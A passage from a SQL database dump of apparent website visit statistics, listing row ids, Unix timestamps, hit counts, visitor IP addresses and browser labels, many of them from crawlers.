chrome'),(330456,1542017186,3,3,0,0,'91.196.178.93','chrome'),(330457,1542017302,1,1,0,0,'54.36.149.51','other'),(330458,1542017349,1,1,0,0,'54.36.149.3','other'),(330459,1542017379,1,1,0,0,'8.29.198.26','other'),(330460,1542017475,1,1,0,0,'66.249.65.211','chrome'),(330461,1542017476,1,1,0,0,'66.249.65.196','chrome'),(330462,1542017957,1,1,0,0,'54.36.148.227','other'),(330463,1542018190,1,1,0,0,'54.36.149.98','other'),(330464,1542018206,1,1,0,0,'37.53.155.176','chrome'),(330465,1542018293,1,1,0,0,'54.36.149.82','other'),(330466,1542018487,1,1,0,0,'46.229.168.137','other'),(330467,1542018550,1,1,0,0,'66.249.65.196','chrome'),(330468,1542018553,1,1,0,0,'106.38.241.190','other'),(330469,1542018752,2,2,0,0,'91.196.178.68','firefox'),(330470,1542018891,1,1,0,0,'46.229.168.150','other'),(330471,1542019013,1,1,0,0,'8.29.198.27','other'),(330472,1542019120,1,1,0,0,'54.36.148.53','other'),(330473,1542019266,4,4,0,0,'216.244.66.241','other'),(330474,1542019541,1,1,0,0,'8.29.198.26','other'),(330475,1542019601,1,1,0,0,'54.165.59.7','other'),(330476,1542019764,1,1,0,0,'54.36.149.77','other'),(330477,1542019804,1,1,0,0,'54.36.148.243','other'),(330478,1542020049,1,1,0,0,'37.53.72.155','firefox'),(330479,1542020147,1,1,0,0,'157.55.39.144','other'),(330480,1542020509,1,1,0,0,'54.36.148.205','other'),(330481,1542020582,1,1,0,0,'66.249.65.213','chrome'),(330482,1542020717,1,1,0,0,'54.36.148.246','other'),(330483,1542020790,1,1,0,0,'54.36.148.59','other'),(330484,1542020976,1,1,0,0,'37.54.36.208','msie'),(330485,1542021305,1,1,0,0,'46.229.168.140','other'),(330486,1542021355,1,1,0,0,'54.36.149.35','other'),(330487,1542021487,1,1,0,0,'54.36.148.176','other'),(330488,1542021633,1,1,0,0,'66.249.73.30','chrome'),(330489,1542021684,2,2,0,0,'216.244.66.241','other'),(330490,1542021894,1,1,0,0,'54.36.148.145','other'),(330491,1542022299,1,1,0,0,'95.158.6.58','chrome'),(330492,1542022318,1,1,0,0,'66.249.65.209','chrome'),(330493,1542022370,2,2,0,0,'207.46.13.156','other'),(330494,1542022440,1,1,0,0,'54.36.148.191','other'),(330495,1542022816,2,2,0,0,'91.196.158.133','chrome'),(330496,1542023170,1,1,0,0,'54.36.148.245','other'),(330497,1542023183,1,1,0,0,'54.36.148.157','other'),(330498,1542024434,3,3,0,0,'216.244.66.241','other'),(330499,1542024674,1,1,0,0,'66.249.65.209','chrome'),(330501,1542025039,1,1,0,0,'54.36.148.187','other'),(330502,1542025042,1,1,0,0,'54.36.148.174','other'),(330503,1542025074,1,1,0,0,'54.36.148.216','other'),(330504,1542025126,2,2,0,0,'66.249.65.198','chrome'),(330505,1542025132,1,1,0,0,'54.36.148.139','other'),(330506,1542025186,1,1,0,0,'54.36.148.181','other'),(330507,1542025238,2,2,0,0,'91.196.178.93','chrome'),(330508,1542025389,1,1,0,0,'54.36.148.86','other'),(330509,1542025504,1,1,0,0,'95.163.255.92','other'),(330510,1542025507,1,1,0,0,'95.163.255.96','other'),(330511,1542025524,1,1,0,0,'207.46.13.172','other'),(330512,1542025646,1,1,0,0,'54.36.148.172','other'),(330513,1542025797,2,2,0,0,'162.210.196.129','other'),(330514,1542025910,1,1,0,0,'54.36.148.141','other'),(330515,1542026147,1,1,0,0,'66.249.73.28','chrome'),(330516,1542026148,1,1,0,0,'66.249.73.1','chrome'),(330517,1542026190,1,1,0,0,'178.255.215.94','other'),(330518,1542026379,1,1,0,0,'54.36.148.211','other'),(330519,1542026419,1,1,0,0,'54.36.148.36','other'),(330520,1542026573,1,1,0,0,'54.36.148.238','other'),(330521,1542026889,3,3,0,0,'91.196.178.75','chrome'),(330522,1542026916,1,1,0,0,'54.36.149.19','other'),(330523,1542027001,1,1,0,0,'54.36.149.90','other'),(330524,1542027021,2,2,0,0,'216.244.66.241','other'),(330525,1542027033,1,1,0,0,'54.36.148.42','other'),(330526,1542027378,1,1,0,0,'54.36.149.101','other'),(330527,1542027773,1,1,0,0,'46.229.168.137','other'),(330528,1542027915,1,1,0,0,'220.243.136.248','chrome'),(330529,1542027920,1,1,0,0,'220.243.136.232','chrome'),(330530,1542027943,1,1,0,0,'220.243.136.186','chrome'),(330531,1542027947,1,1,0,0,'220.243.136.176','chrome'),(330532,1542028013,1,1,0,0,'46.63.104.111','chrome'),(330533,1542028204,1,1,0,0,'54.36.148.32','other'),(330534,1542028223,1,1,0,0,'8.29.198.26','other'),(330535,1542028404,2,2,0,0,'54.36.148.215','other'),(330536,1542028571,1,1,0,0,'54.36.148.247','other'),(330537,1542028928,1,1,0,0,'54.36.148.148','other'),(330538,1542029050,1,1,0,0,'46.229.168.149','other'),(330539,1542029053,1,1,0,0,'46.229.168.141','other'),(330540,1542029126,2,2,0,0,'66.249.65.198','chrome'),(330541,1542029218,1,1,0,0,'54.36.148.97','other'),(330542,1542029266,1,1,0,0,'54.36.149.3','other'),(330543,1542029370,5,5,0,0,'216.244.66.241','other'),(330544,1542029429,1,1,0,0,'46.229.168.150','other'),(330545,1542029445,1,1,0,0,'54.36.149.39','other'),(330546,1542029511,1,1,0,0,'54.36.148.235','other'),(330547,1542029856,1,1,0,0,'8.29.198.25','other'),(330548,1542029891,3,3,0,0,'66.249.65.209','chrome'),(330549,1542029892,1,1,0,0,'66.249.65.196','chrome'),(330550,1542029897,2,2,0,0,'66.249.65.194','chrome'),(330551,1542029985,1,1,0,0,'54.36.149.48','other'),(330552,1542029998,1,1,0,0,'46.229.168.145','other'),(330553,1542030117,1,1,0,0,'66.249.65.198','chrome'),(330554,1542030294,1,1,0,0,'54.36.148.106','other'),(330555,1542030388,1,1,0,0,'54.36.149.107','other'),(330556,1542030401,1,1,0,0,'8.29.198.26','other'),(330557,1542030450,1,1,0,0,'54.36.148.34','other'),(330558,1542031354,1,1,0,0,'216.244.66.241','other'),(330559,1542031467,1,1,0,0,'54.36.148.209','other'),(330560,1542031503,1,1,0,0,'54.36.148.130','other'),(330561,1542032018,1,1,0,0,'66.249.73.29','chrome'),(330562,1542032019,1,1,0,0,'66.249.73.30','chrome'),(330563,1542032249,1,1,0,0,'95.132.24.73','chrome'),(330564,1542032259,2,2,0,0,'216.244.66.241','other'),(330565,1542032382,1,1,0,0,'54.36.148.235','other'),(330566,1542032404,1,1,0,0,'54.36.148.27','other'),(330567,1542032727,1,1,0,0,'46.229.168.146','other'),(330568,1542032827,1,1,0,0,'66.249.65.198','chrome'),(330569,1542033068,2,2,0,0,'91.196.178.93','chrome'),(330570,1542033116,1,1,0,0,'54.36.148.188','other'),(330571,1542033206,1,1,0,0,'54.36.148.210','other'),(330572,1542033247,1,1,0,0,'54.36.148.163','other'),(330573,1542033260,1,1,0,0,'54.36.148.161','other'),(330574,1542033352,1,1,0,0,'95.132.24.73','chrome'),(330575,1542033411,1,1,0,0,'66.249.65.211','chrome'),(330576,1542033412,1,1,0,0,'66.249.65.196','chrome'),(330577,1542033677,1,1,0,0,'66.249.66.61','chrome'),(330578,1542033678,1,1,0,0,'66.249.66.42','chrome'),(330579,1542033821,3,3,0,0,'66.249.66.156','chrome'),(330580,1542033822,2,2,0,0,'66.249.66.154','chrome'),(330581,1542033881,1,1,0,0,'54.36.148.21','other'),(330582,1542033917,1,1,0,0,'213.109.129.149','chrome'),(330583,1542034009,4,4,0,0,'216.244.66.241','other'),(330584,1542034036,1,1,0,0,'54.36.148.127','other'),(330585,1542034370,1,1,0,0,'54.36.148.104','other'),(330586,1542034460,1,1,0,0,'54.36.149.20','other'),(330587,1542034945,1,1,0,0,'54.36.148.85','other'),(330588,1542035113,2,2,0,0,'178.154.244.29','other'),(330589,1542035321,1,1,0,0,'91.196.178.37','chrome'),(330590,1542035542,1,1,0,0,'54.36.148.160','other'),(330591,1542035661,2,2,0,0,'91.124.182.170','firefox'),(330592,1542035671,1,1,0,0,'54.36.149.42','other'),(330593,1542035806,1,1,0,0,'54.36.149.82','other'),(330594,1542035939,1,1,0,0,'54.36.149.72','other'),(330595,1542036005,2,2,0,0,'91.196.178.87','firefox'),(330596,1542036290,1,1,0,0,'46.229.168.137','other'),(330597,1542036292,1,1,0,0,'46.229.168.142','other'),(330598,1542036509,1,1,0,0,'54.36.148.164','other'),(330599,1542036611,1,1,0,0,'54.36.148.57','other'),(330600,1542036671,1,1,0,0,'66.249.66.156','chrome'),(330601,1542036673,2,2,0,0,'91.196.178.75','chrome'),(330602,1542036677,1,1,0,0,'54.36.149.5','other'),(330603,1542036773,1,1,0,0,'54.36.148.232','other'),(330604,1542036958,1,1,0,0,'216.244.66.241','other'),(330605,1542037183,1,1,0,0,'207.46.13.172','other'),(330606,1542037428,1,1,0,0,'87.250.224.65','other'),(330607,1542037429,1,1,0,0,'37.9.113.148','other'),(330608,1542037480,1,1,0,0,'54.36.148.89','other'),(330609,1542037924,1,1,0,0,'54.36.149.46','other'),(330610,1542037985,1,1,0,0,'66.249.66.156','chrome'),(330611,1542038383,2,2,0,0,'46.229.168.129','other'),(330612,1542038387,1,1,0,0,'46.229.168.142','other'),(330613,1542038482,1,1,0,0,'46.229.168.140','other'),(330614,1542038563,1,1,0,0,'46.229.168.153','other'),(330615,1542038960,1,1,0,0,'46.229.168.146','other'),(330616,1542038977,1,1,0,0,'46.229.168.145','other'),(330617,1542038980,1,1,0,0,'46.229.168.147','other'),(330618,1542039076,1,1,0,0,'8.29.198.27','other'),(330619,1542039106,1,1,0,0,'54.36.149.24','other'),(330620,1542039327,3,3,0,0,'216.244.66.241','other'),(330621,1542039349,1,1,0,0,'54.36.149.33','other'),(330622,1542039354,1,1,0,0,'54.36.149.5','other'),(330623,1542039380,1,1,0,0,'54.36.148.43','other'),(330624,1542039759,1,1,0,0,'54.36.148.183','other'),(330625,1542039817,1,1,0,0,'46.229.168.140','other'),(330626,1542040024,1,1,0,0,'54.36.148.20','other'),(330627,1542040030,1,1,0,0,'54.36.148.75','other'),(330628,1542040271,2,2,0,0,'216.244.66.241','other'),(330629,1542040361,1,1,0,0,'54.36.148.16','other'),(330630,1542040616,1,1,0,0,'54.36.148.45','other'),(330631,1542040688,1,1,0,0,'8.29.198.25','other'),(330632,1542040826,1,1,0,0,'46.229.168.148','other'),(330633,1542040829,1,1,0,0,'46.229.168.144','other'),(330634,1542040904,1,1,0,0,'46.229.168.141','other'),(330635,1542041106,1,1,0,0,'54.36.148.228','other'),(330636,1542041249,1,1,0,0,'8.29.198.27','other'),(330637,1542041314,1,1,0,0,'54.36.149.36','other'),(330638,1542041371,1,1,0,0,'54.36.148.43','other'),(330639,1542041540,1,1,0,0,'157.55.39.144','other'),(330640,1542041669,1,1,0,0,'54.36.149.3','other'),(330641,1542041707,1,1,0,0,'54.36.148.119','other'),(330642,1542041723,1,1,0,0,'207.46.13.156','other'),(330643,1542041877,1,1,0,0,'54.36.148.170','other'),(330644,1542042597,1,1,0,0,'216.244.66.241','other'),(330645,1542042771,1,1,0,0,'54.36.149.34','other'),(330646,1542043027,1,1,0,0,'54.36.149.97','other'),(330647,1542043028,1,1,0,0,'54.36.149.55','other'),(330648,1542043044,1,1,0,0,'66.249.66.156','chrome'),(330649,1542043047,1,1,0,0,'66.249.66.152','chrome'),(330650,1542043091,2,2,0,0,'190.2.148.176','chrome'),(330651,1542043189,1,1,0,0,'46.229.168.140','other'),(330652,1542043302,1,1,0,0,'54.36.148.98','other'),(330653,1542043508,1,1,0,0,'54.36.148.65','other'),(330654,1542043556,1,1,0,0,'46.229.168.138','other'),(330655,1542043558,1,1,0,0,'46.229.168.133','other'),(330656,1542043745,1,1,0,0,'54.36.148.139','other'),(330657,1542044032,1,1,0,0,'66.249.66.44','chrome'),(330658,1542044121,1,1,0,0,'54.36.149.58','other'),(330659,1542044383,4,4,0,0,'216.244.66.241','other'),(330660,1542044812,1,1,0,0,'54.36.149.80','other'),(330661,1542044846,1,1,0,0,'54.36.148.38','other'),(330662,1542044911,1,1,0,0,'54.36.148.56','other'),(330663,1542045126,1,1,0,0,'54.36.148.115','other'),(330664,1542045492,1,1,0,0,'54.36.148.131','other'),(330665,1542045499,4,4,0,0,'66.249.66.156','chrome'),(330666,1542045523,1,1,0,0,'66.249.66.154','chrome'),(330667,1542045562,2,2,0,0,'46.211.122.202','chrome'),(330668,1542045630,1,1,0,0,'207.46.13.172','other'),(330669,1542045670,1,1,0,0,'54.36.148.185','other'),(330670,1542045753,1,1,0,0,'66.249.66.42','chrome'),(330671,1542046216,1,1,0,0,'66.249.66.155','chrome'),(330672,1542046412,2,2,0,0,'216.244.66.241','other'),(330673,1542046431,1,1,0,0,'207.46.13.156','other'),(330674,1542046432,1,1,0,0,'54.36.148.10','other'),(330675,1542046661,1,1,0,0,'54.36.148.177','other'),(330676,1542046734,1,1,0,0,'46.229.168.130','other'),(330677,1542046736,2,2,0,0,'46.229.168.152','other'),(330678,1542046902,1,1,0,0,'95.163.255.95','other'),(330679,1542046905,1,1,0,0,'95.163.255.98','other'),(330680,1542046930,1,1,0,0,'66.249.66.156','chrome'),(330681,1542046932,1,1,0,0,'66.249.66.152','chrome'),(330682,1542046937,1,1,0,0,'54.36.148.136','other'),(330683,1542047057,1,1,0,0,'54.36.148.103','other'),(330684,1542047350,1,1,0,0,'54.36.148.85','other'),(330685,1542047528,4,4,0,0,'216.244.66.241','other'),(330686,1542047596,2,2,0,0,'46.229.168.138','other'),(330687,1542047666,1,1,0,0,'46.229.168.145','other'),(330688,1542048145,1,1,0,0,'54.36.149.52','other'),(330689,1542048153,1,1,0,0,'178.212.111.36','chrome'),(330690,1542048274,1,1,0,0,'54.36.149.21','other'),(330691,1542048467,1,1,0,0,'66.249.66.154','chrome'),(330692,1542048659,1,1,0,0,'54.36.149.69','other'),(330693,1542048870,1,1,0,0,'95.163.255.97','other'),(330694,1542048874,1,1,0,0,'95.163.255.99','other'),(330695,1542049267,1,1,0,0,'46.229.168.132','other'),(330696,1542049269,1,1,0,0,'46.229.168.153','other'),(330697,1542049833,1,1,0,0,'109.86.25.244','chrome'),(330698,1542049919,1,1,0,0,'8.29.198.27','other'),(330699,1542049923,1,1,0,0,'54.36.149.41','other'),(330700,1542049941,3,3,0,0,'216.244.66.241','other'),(330701,1542049978,1,1,0,0,'54.36.148.246','other'),(330702,1542050104,1,1,0,0,'66.249.66.152','chrome'),(330703,1542050453,1,1,0,0,'54.36.148.66','other'),(330704,1542050556,1,1,0,0,'54.36.148.136','other'),(330705,1542050739,1,1,0,0,'66.249.66.156','chrome'),(330706,1542050830,1,1,0,0,'54.36.148.203','other'),(330707,1542051137,1,1,0,0,'54.36.148.85','other'),(330708,1542051140,1,1,0,0,'54.36.148.197','other'),(330709,1542051371,1,1,0,0,'54.36.149.42','other'),(330710,1542051372,1,1,0,0,'54.36.149.61','other'),(330711,1542051519,1,1,0,0,'8.29.198.25','other'),(330712,1542051914,1,1,0,0,'54.36.148.175','other'),(330713,1542052050,1,0,1,0,'66.249.66.154',''),(330714,1542052096,1,1,0,0,'8.29.198.26','other'),(330715,1542052352,4,4,0,0,'216.244.66.241','other'),(330716,1542052418,1,1,0,0,'54.36.149.12','other'),(330717,1542052742,1,1,0,0,'54.36.148.108','other'),(330718,1542053013,1,1,0,0,'66.249.66.154','chrome'),(330719,1542053257,1,1,0,0,'54.36.148.33','other'),(330720,1542053296,1,1,0,0,'46.229.168.141','other'),(330721,1542053387,1,1,0,0,'54.36.149.98','other'),(330722,1542053788,1,1,0,0,'54.36.148.176','other'),(330723,1542054408,1,1,0,0,'46.229.168.153','other'),(330724,1542054443,1,1,0,0,'54.36.149.107','other'),(330725,1542054608,1,1,0,0,'54.36.148.79','other'),(330726,1542054850,3,3,0,0,'216.244.66.241','other'),(330727,1542055285,1,1,0,0,'66.249.66.156','chrome'),(330728,1542055316,1,1,0,0,'54.36.148.153','other'),(330729,1542055356,1,1,0,0,'54.36.149.86','other'),(330730,1542055483,1,1,0,0,'54.36.149.40','other'),(330731,1542055728,1,1,0,0,'54.36.148.234','other'),(330732,1542055882,1,1,0,0,'54.36.148.142','other'),(330733,1542055968,2,2,0,0,'54.36.149.32','other'),(330734,1542056266,1,1,0,0,'66.249.66.156','chrome'),(330735,1542056458,1,1,0,0,'46.229.168.148','other'),(330736,1542056463,1,1,0,0,'54.36.149.47','other'),(330737,1542056496,1,1,0,0,'54.36.149.66','other'),(330738,1542056522,1,1,0,0,'54.36.148.239','other'),(330739,1542056624,1,1,0,0,'207.46.13.156','other'),(330740,1542057083,1,1,0,0,'54.36.149.88','other'),(330741,1542057162,1,1,0,0,'178.154.244.29','other'),(330742,1542057163,1,1,0,0,'178.154.244.11','other'),(330743,1542057446,1,1,0,0,'54.36.148.136','other'),(330744,1542057558,1,1,0,0,'66.249.66.154','chrome'),(330745,1542057619,1,1,0,0,'54.36.149.53','other'),(330746,1542057636,3,3,0,0,'216.244.66.241','other'),(330747,1542057694,1,1,0,0,'54.36.149.97','other'),(330748,1542057778,1,1,0,0,'54.36.148.18','other'),(330749,1542057781,2,2,0,0,'54.36.148.240','other'),(330750,1542057900,1,1,0,0,'54.36.148.170','other'),(330751,1542058597,1,1,0,0,'54.36.149.56','other'),(330752,1542059091,1,1,0,0,'54.36.149.45','other'),(330753,1542059241,1,1,0,0,'54.36.149.8','other'),(330754,1542059250,1,1,0,0,'66.249.66.154','chrome'),(330755,1542059440,1,1,0,0,'54.36.149.26','other'),(330756,1542059557,1,1,0,0,'66.249.66.156','chrome'),(330757,1542059919,1,1,0,0,'46.229.168.138','other'),(330758,1542059920,4,4,0,0,'216.244.66.241','other'),(330759,1542059921,1,1,0,0,'46.229.168.132','other'),(330760,1542059979,3,3,0,0,'93.78.212.140','firefox'),(330761,1542060102,1,1,0,0,'54.36.148.103','other'),(330762,1542060158,1,1,0,0,'66.249.66.59','chrome'),(330763,1542060159,1,1,0,0,'66.249.66.42','chrome'),(330764,1542060177,1,1,0,0,'54.36.148.221','other'),(330765,1542060273,1,1,0,0,'54.36.148.30','other'),(330766,1542060483,1,1,0,0,'66.249.66.155','chrome'),(330768,1542060513,2,2,0,0,'91.209.11.236','other'),(330769,1542060605,1,1,0,0,'54.36.149.28','other'),(330770,1542060767,1,1,0,0,'8.29.198.26','other'),(330771,1542061022,2,2,0,0,'66.249.66.152','chrome'),(330772,1542061050,1,1,0,0,'54.36.148.140','other'),(330773,1542061169,1,1,0,0,'46.229.168.146','other'),(330774,1542061209,1,1,0,0,'66.249.66.157','chrome'),(330775,1542061500,1,1,0,0,'54.36.148.107','other'),(330776,1542061749,1,1,0,0,'66.249.66.154','chrome'),(330777,1542061946,1,1,0,0,'54.36.148.49','other'),(330778,1542062024,1,1,0,0,'54.36.148.117','other'),(330779,1542062105,1,1,0,0,'66.249.66.156','chrome'),(330780,1542062191,1,1,0,0,'54.36.148.161','other'),(330781,1542062225,5,5,0,0,'216.244.66.241','other'),(330782,1542062358,1,1,0,0,'8.29.198.26','other'),(330783,1542062694,1,1,0,0,'54.36.148.101','other'),(330784,1542062932,1,1,0,0,'8.29.198.27','other'),(330785,1542063044,1,1,0,0,'54.36.149.36','other'),(330786,1542063065,1,1,0,0,'54.36.148.230','other'),(330787,1542063176,1,1,0,0,'54.36.148.246','other'),(330788,1542063532,1,1,0,0,'54.36.148.121','other'),(330789,1542063677,1,1,0,0,'207.46.13.190','other'),(330790,1542063758,1,1,0,0,'54.36.149.79','other'),(330791,1542063971,1,1,0,0,'54.36.148.139','other'),(330792,1542064003,1,1,0,0,'54.36.149.69','other'),(330793,1542064162,1,1,0,0,'54.36.148.38','other'),(330794,1542064377,2,2,0,0,'66.249.66.154','chrome'),(330795,1542064813,1,1,0,0,'54.36.148.102','other'),(330796,1542064857,1,1,0,0,'54.36.148.34','other'),(330797,1542065076,1,1,0,0,'54.36.149.101','other'),(330798,1542065312,1,1,0,0,'46.229.168.129','other'),(330799,1542065399,1,1,0,0,'54.36.148.160','other'),(330800,1542065407,1,1,0,0,'54.36.148.60','other'),(330801,1542065461,1,1,0,0,'54.36.148.11','other'),(330802,1542065509,2,2,0,0,'66.249.66.156','chrome'),(330803,1542065564,1,1,0,0,'216.244.66.241','other'),(330804,1542065877,2,2,0,0,'66.249.66.157','chrome'),(330805,1542065887,2,2,0,0,'66.249.66.154','chrome'),(330806,1542066173,1,1,0,0,'54.36.148.95','other'),(330807,1542066311,1,1,0,0,'66.249.66.42','chrome'),(330808,1542066342,1,1,0,0,'54.36.149.105','other'),(330809,1542066410,1,1,0,0,'66.249.66.152','chrome'),(330810,1542066651,1,1,0,0,'66.249.66.156','chrome'),(330811,1542066923,1,1,0,0,'62.205.134.182','other'),(330812,1542067045,1,1,0,0,'91.193.172.180','chrome'),(330813,1542067146,1,1,0,0,'69.30.226.234','other'),(330814,1542067224,1,1,0,0,'46.229.168.152','other'),(330815,1542067418,1,1,0,0,'54.36.148.31','other'),(330816,1542067469,1,1,0,0,'54.36.148.18','other'),(330817,1542068154,4,4,0,0,'216.244.66.241','other'),(330818,1542068344,1,1,0,0,'54.36.149.33','other'),(330819,1542068503,1,1,0,0,'54.36.149.4','other'),(330820,1542068924,1,1,0,0,'66.249.66.152','chrome'),(330821,1542068940,1,1,0,0,'54.36.148.188','other'),(330822,1542069094,1,1,0,0,'54.36.149.97','other'),(330823,1542069672,1,1,0,0,'54.36.149.66','other'),(330824,1542069832,18,18,0,0,'144.76.40.222','other'),(330825,1542069848,1,1,0,0,'66.249.66.157','chrome'),(330826,1542069931,1,1,0,0,'46.229.168.133','other'),(330827,1542069933,1,1,0,0,'46.229.168.138','other'),(330828,1542069969,1,1,0,0,'66.249.66.156','chrome'),(330829,1542070082,1,1,0,0,'54.36.149.37','other'),(330830,1542070282,1,1,0,0,'66.249.66.155','chrome'),(330831,1542070290,6,6,0,0,'216.244.66.241','other'),(330832,1542070292,1,1,0,0,'66.249.66.154','chrome'),(330833,1542070343,1,1,0,0,'66.249.66.61','chrome'),(330834,1542070365,1,1,0,0,'66.249.66.42','chrome'),(330835,1542070549,1,1,0,0,'54.36.148.186','other'),(330836,1542070555,1,1,0,0,'46.229.168.143','other'),(330837,1542070557,1,1,0,0,'46.229.168.129','other'),(330838,1542071197,2,2,0,0,'66.249.66.154','chrome'),(330839,1542071214,1,1,0,0,'54.36.148.235','other'),(330840,1542071260,1,1,0,0,'54.36.149.16','other'),(330841,1542071274,1,1,0,0,'46.229.168.140','other'),(330842,1542071456,1,1,0,0,'54.36.149.28','other'),(330843,1542071548,1,1,0,0,'54.36.148.141','other'),(330844,1542071610,1,1,0,0,'8.29.198.27','other'),(330845,1542071618,1,1,0,0,'66.249.66.156','chrome'),(330846,1542071636,1,1,0,0,'66.249.66.152','chrome'),(330847,1542071685,1,1,0,0,'54.36.148.37','other'),(330848,1542072301,1,1,0,0,'207.46.13.172','other'),(330849,1542072641,1,1,0,0,'123.206.197.121','other'),(330850,1542072668,1,1,0,0,'54.36.148.78','other'),(330851,1542073204,1,1,0,0,'8.29.198.26','other'),(330852,1542073248,1,1,0,0,'54.36.148.64','other'),(330853,1542073418,1,1,0,0,'54.36.148.158','other'),(330854,1542073471,1,1,0,0,'66.249.66.154','chrome'),(330855,1542073532,1,1,0,0,'66.249.66.40','chrome'),(330856,1542073768,1,1,0,0,'8.29.198.25','other'),(330857,1542074059,1,1,0,0,'54.36.148.247','other'),(330858,1542074061,1,1,0,0,'54.36.148.67','other'),(330859,1542074063,1,1,0,0,'54.36.148.10','other'),(330860,1542074182,1,1,0,0,'54.36.149.56','other'),(330861,1542074468,2,2,0,0,'66.249.66.155','chrome'),(330863,1542074480,1,1,0,0,'54.36.148.197','other'),(330864,1542074574,1,1,0,0,'66.249.66.152','chrome'),(330865,1542074622,1,1,0,0,'46.229.168.148','other'),(330866,1542074664,2,2,0,0,'66.249.66.156','chrome'),(330867,1542074670,1,1,0,0,'66.249.66.154','chrome'),(330868,1542074957,3,3,0,0,'216.244.66.241','other'),(330869,1542075261,1,1,0,0,'54.36.149.3','other'),(330870,1542075311,1,1,0,0,'54.36.148.254','other'),(330871,1542075388,1,1,0,0,'46.229.168.144','other'),(330872,1542075453,1,1,0,0,'46.229.168.133','other'),(330873,1542075454,1,1,0,0,'46.229.168.136','other'),(330874,1542075558,1,1,0,0,'66.249.66.157','chrome'),(330875,1542075605,2,2,0,0,'66.249.66.156','chrome'),(330876,1542075746,3,3,0,0,'66.249.66.154','chrome'),(330877,1542075786,1,1,0,0,'54.36.149.30','other'),(330878,1542075804,1,1,0,0,'54.36.148.12','other'),(330879,1542075978,1,1,0,0,'66.249.66.61','chrome'),(330880,1542075979,1,1,0,0,'66.249.66.42','chrome'),(330881,1542075981,2,2,0,0,'216.244.66.241','other'),(330882,1542076127,1,1,0,0,'66.249.66.57','chrome'),(330884,1542076202,1,1,0,0,'207.46.13.156','other'),(330885,1542076288,1,1,0,0,'54.36.149.71','other'),(330886,1542076375,1,1,0,0,'54.36.148.178','other'),(330887,1542076725,2,2,0,0,'91.209.11.236','other'),(330888,1542076932,1,1,0,0,'54.36.149.20','other'),(330889,1542077364,6,6,0,0,'216.244.66.241','other'),(330890,1542077365,2,2,0,0,'54.245.47.139','chrome'),(330891,1542077411,1,1,0,0,'54.36.148.122','other'),(330892,1542077731,1,1,0,0,'66.249.66.155','chrome'),(330893,1542077756,1,1,0,0,'66.249.66.152','chrome'),(330894,1542077827,2,2,0,0,'207.46.13.190','other'),(330895,1542078294,1,1,0,0,'66.249.66.154','chrome'),(330896,1542078310,1,1,0,0,'54.36.148.115','other'),(330897,1542078434,1,1,0,0,'54.36.149.65','other'),(330898,1542078500,1,1,0,0,'54.36.148.131','other'),(330899,1542078623,1,1,0,0,'216.244.66.241','other'),(330900,1542078648,1,1,0,0,'54.36.149.102','other'),(330901,1542078780,1,1,0,0,'54.36.149.105','other'),(330902,1542078861,1,1,0,0,'54.36.148.126','other'),(330903,1542078898,1,1,0,0,'54.36.148.213','other'),(330904,1542079000,1,1,0,0,'54.36.148.113','other'),(330905,1542079070,1,1,0,0,'54.36.148.221','other'),(330906,1542079078,1,1,0,0,'54.36.148.241','other'),(330907,1542079175,1,1,0,0,'207.46.13.156','other'),(330908,1542079193,1,1,0,0,'54.36.148.234','other'),(330909,1542079708,1,1,0,0,'54.36.149.91','other'),(330910,1542079743,1,1,0,0,'54.36.148.104','other'),(330911,1542079777,2,2,0,0,'91.209.11.236','other'),(330912,1542079853,1,1,0,0,'54.36.148.67','other'),(330913,1542080019,1,1,0,0,'54.36.148.111','other'),(330914,1542080292,2,2,0,0,'66.249.66.156','chrome'),(330915,1542080326,4,4,0,0,'216.244.66.241','other'),(330916,1542080391,1,1,0,0,'54.36.148.133','other'),(330917,1542080565,1,1,0,0,'54.36.149.76','other'),(330918,1542080573,1,1,0,0,'54.36.148.248','other'),(330919,1542080862,1,1,0,0,'54.36.148.44','other'),(330920,1542080925,1,1,0,0,'54.36.148.119','other'),(330921,1542081566,2,2,0,0,'66.249.66.152','chrome'),(330922,1542081856,2,2,0,0,'216.244.66.241','other'),(330923,1542081878,12,12,0,0,'23.237.4.26','other'),(330924,1542081975,1,1,0,0,'54.36.148.135','other'),(330925,1542082447,1,1,0,0,'8.29.198.26','other'),(330926,1542082564,1,1,0,0,'66.249.66.154','chrome'),(330927,1542082569,1,1,0,0,'207.46.13.156','other'),(330928,1542082590,1,1,0,0,'54.36.149.33','other'),(330929,1542082645,1,1,0,0,'54.36.148.146','other'),(330930,1542082736,2,2,0,0,'91.209.11.236','other'),(330931,1542083068,1,1,0,0,'216.244.66.241','other'),(330932,1542083167,1,1,0,0,'54.36.149.6','other'),(330933,1542083715,1,1,0,0,'54.36.148.41','other'),(330934,1542083716,1,1,0,0,'54.36.148.20','other'),(330935,1542083811,1,1,0,0,'66.102.9.35','chrome'),(330936,1542083815,1,1,0,0,'46.211.51.108','chrome'),(330937,1542083839,1,1,0,0,'207.46.13.172','other'),(330938,1542084035,1,1,0,0,'54.36.148.133','other'),(330939,1542084039,2,2,0,0,'8.29.198.27','other'),(330940,1542084435,1,1,0,0,'54.36.148.27','other'),(330941,1542084460,1,1,0,0,'54.36.148.124','other'),(330942,1542084570,1,1,0,0,'66.249.66.156','chrome'),(330943,1542084675,1,1,0,0,'54.36.148.15','other'),(330944,1542084837,1,1,0,0,'66.249.66.154','chrome'),(330945,1542085119,1,1,0,0,'54.36.148.237','other'),(330946,1542085120,1,1,0,0,'31.184.238.56','chrome'),(330947,1542085278,1,1,0,0,'95.163.255.68','other'),(330948,1542085280,1,1,0,0,'95.163.255.62','other'),(330949,1542085431,3,3,0,0,'216.244.66.241','other'),(330950,1542085718,1,1,0,0,'54.36.149.106','other'),(330951,1542085831,2,2,0,0,'157.55.39.144','other'),(330952,1542086168,1,1,0,0,'54.36.148.69','other'),(330953,1542086377,1,1,0,0,'54.36.148.45','other'),(330954,1542086426,1,1,0,0,'216.244.66.241','other'),(330955,1542086538,1,1,0,0,'54.36.148.220','other'),(330956,1542086685,2,2,0,0,'95.163.255.118','other'),(330957,1542086699,2,2,0,0,'95.163.255.108','other'),(330958,1542086705,2,2,0,0,'95.163.255.115','other'),(330959,1542086729,2,2,0,0,'95.163.255.114','other'),(330960,1542086770,1,1,0,0,'54.36.149.36','other'),(330961,1542087110,1,1,0,0,'66.249.66.152','chrome'),(330962,1542087383,1,1,0,0,'66.249.66.156','chrome'),(330963,1542087823,1,1,0,0,'54.36.148.99','other'),(330964,1542087887,1,1,0,0,'54.36.148.116','other'),(330965,1542087928,1,1,0,0,'54.36.149.86','other'),(330966,1542088367,5,5,0,0,'216.244.66.241','other'),(330967,1542089203,1,1,0,0,'91.196.178.133','chrome'),(330968,1542089380,1,1,0,0,'54